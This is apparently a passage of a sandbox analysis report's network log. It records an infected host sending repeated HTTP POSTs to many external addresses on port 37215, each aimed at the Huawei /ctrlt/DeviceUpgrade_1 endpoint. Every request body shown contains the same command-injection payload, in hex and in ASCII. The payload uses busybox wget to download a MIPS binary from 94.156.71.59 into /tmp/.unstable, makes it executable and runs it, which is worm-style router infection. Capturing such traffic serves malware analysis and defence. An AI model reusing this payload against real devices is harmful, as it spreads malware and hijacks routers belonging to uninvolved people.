                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1119192.168.2.1342362156.157.64.337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.804426908 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1120192.168.2.1359304156.229.98.8937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.806962013 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1121192.168.2.1354532156.73.9.1937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.810214996 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1122192.168.2.1354674156.66.57.24237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.812949896 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1123192.168.2.135471841.158.168.18037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.815848112 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1124192.168.2.1354014156.126.167.5237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.818885088 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1125192.168.2.1337354156.12.72.19037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.822395086 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1126192.168.2.135758641.128.228.337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.825361967 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1127192.168.2.1358430156.155.49.12237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.828306913 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1128192.168.2.1358414156.92.252.6737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.831365108 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
